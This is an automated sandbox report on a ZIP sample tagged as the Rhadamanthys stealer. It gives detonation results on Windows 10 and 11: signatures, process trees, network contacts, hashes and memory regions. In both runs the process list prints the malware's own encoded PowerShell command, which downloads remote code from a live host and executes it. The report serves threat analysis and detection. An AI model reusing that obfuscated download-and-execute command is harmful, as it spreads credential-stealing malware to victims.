Malware Analysis Report

2024-11-13 13:50

Sample ID 240405-jk4fjsfb53
Target 6391-BST-SH.zip
SHA256 31bf95ff1e9fc8d0a1787c473e12a1448e7c34ea586e4c4ee5f68ab5d15ac594
Tags
rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

31bf95ff1e9fc8d0a1787c473e12a1448e7c34ea586e4c4ee5f68ab5d15ac594

Threat Level: Known bad

The file 6391-BST-SH.zip was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-05 07:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-05 07:44

Reported

2024-04-05 07:47

Platform

win10v2004-20240226-en

Max time kernel

128s

Max time network

129s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3236 created 2528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\6391-BST-SH.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwB2AGkAegBpAGoAYQAzADYAMAAuAGwAdAAvAGQAbwBjAC4AdAB4AHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACAAfAAgAGkATgB2AE8AawBFAC0ARQB4AFAAcgBlAFMAcwBpAE8AbgA=

C:\Windows\system32\dialer.exe

"C:\Windows\system32\dialer.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 vizija360.lt udp
LT 193.46.84.144:443 vizija360.lt tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 138.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 144.84.46.193.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 136.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp

Files

memory/3236-2-0x000001F7B9980000-0x000001F7B99A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qwr2h0yp.vu5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3236-12-0x00007FF873F20000-0x00007FF8749E1000-memory.dmp

memory/3236-13-0x000001F7B9A60000-0x000001F7B9A70000-memory.dmp

memory/3236-14-0x000001F7B9A60000-0x000001F7B9A70000-memory.dmp

memory/3236-15-0x000001F7B99D0000-0x000001F7B9A2E000-memory.dmp

memory/3236-16-0x000001F7B9A30000-0x000001F7B9A40000-memory.dmp

memory/3236-18-0x000001F7B9A30000-0x000001F7B9A40000-memory.dmp

memory/3236-17-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/3236-20-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/3236-19-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/3236-21-0x00007FF891F90000-0x00007FF892185000-memory.dmp

memory/3236-23-0x00007FF890960000-0x00007FF890A1E000-memory.dmp

memory/3236-22-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/3236-24-0x00007FF88F7E0000-0x00007FF88FAA9000-memory.dmp

memory/2488-25-0x000002608BCF0000-0x000002608BCF9000-memory.dmp

memory/2488-30-0x000002608D7D0000-0x000002608DBD0000-memory.dmp

memory/2488-29-0x000002608D7D0000-0x000002608DBD0000-memory.dmp

memory/3236-31-0x00007FF873F20000-0x00007FF8749E1000-memory.dmp

memory/2488-33-0x000002608D7D0000-0x000002608DBD0000-memory.dmp

memory/2488-34-0x00007FF891F90000-0x00007FF892185000-memory.dmp

memory/2488-35-0x00007FF890960000-0x00007FF890A1E000-memory.dmp

memory/3236-32-0x000001F7BA060000-0x000001F7BA460000-memory.dmp

memory/2488-36-0x00007FF88F7E0000-0x00007FF88FAA9000-memory.dmp

memory/2488-37-0x000002608D7D0000-0x000002608DBD0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-05 07:44

Reported

2024-04-05 07:47

Platform

win11-20240221-en

Max time kernel

147s

Max time network

149s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3760 created 3004 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\sihost.exe

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\6391-BST-SH.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -Ex Bypass -Enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwB2AGkAegBpAGoAYQAzADYAMAAuAGwAdAAvAGQAbwBjAC4AdAB4AHQAIAAtAFUAcwBlAEIAYQBzAGkAYwBQAGEAcgBzAGkAbgBnACkALgBDAG8AbgB0AGUAbgB0ACAAfAAgAGkATgB2AE8AawBFAC0ARQB4AFAAcgBlAFMAcwBpAE8AbgA=

C:\Windows\system32\dialer.exe

"C:\Windows\system32\dialer.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 vizija360.lt udp
LT 193.46.84.144:443 vizija360.lt tcp
US 8.8.8.8:53 144.84.46.193.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmrw2nlz.dxo.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3760-11-0x00007FFA197C0000-0x00007FFA1A282000-memory.dmp

memory/3760-10-0x000001F0FB6E0000-0x000001F0FB702000-memory.dmp

memory/3760-12-0x000001F0FABB0000-0x000001F0FABC0000-memory.dmp

memory/3760-13-0x000001F0FABB0000-0x000001F0FABC0000-memory.dmp

memory/3760-14-0x000001F0FABB0000-0x000001F0FABC0000-memory.dmp

memory/3760-15-0x000001F0FBB60000-0x000001F0FBBBE000-memory.dmp

memory/3760-16-0x000001F0FBBC0000-0x000001F0FBBD0000-memory.dmp

memory/3760-18-0x000001F0FBBC0000-0x000001F0FBBD0000-memory.dmp

memory/3760-19-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/3760-17-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/3760-20-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/3760-21-0x00007FFA3A660000-0x00007FFA3A869000-memory.dmp

memory/3760-22-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/3760-23-0x00007FFA397E0000-0x00007FFA3989D000-memory.dmp

memory/2720-25-0x000001E4B87B0000-0x000001E4B87B9000-memory.dmp

memory/3760-24-0x00007FFA37E00000-0x00007FFA38174000-memory.dmp

memory/3760-29-0x00007FFA3A660000-0x00007FFA3A869000-memory.dmp

memory/3760-31-0x000001F0FBBE0000-0x000001F0FBFE0000-memory.dmp

memory/2720-32-0x000001E4BA2A0000-0x000001E4BA6A0000-memory.dmp

memory/2720-35-0x00007FFA3A660000-0x00007FFA3A869000-memory.dmp

memory/3760-34-0x00007FFA197C0000-0x00007FFA1A282000-memory.dmp

memory/2720-38-0x00007FFA37E00000-0x00007FFA38174000-memory.dmp

memory/2720-37-0x000001E4BA2A0000-0x000001E4BA6A0000-memory.dmp

memory/2720-36-0x00007FFA397E0000-0x00007FFA3989D000-memory.dmp

memory/2720-39-0x000001E4BA2A0000-0x000001E4BA6A0000-memory.dmp

memory/2720-40-0x00007FFA3A660000-0x00007FFA3A869000-memory.dmp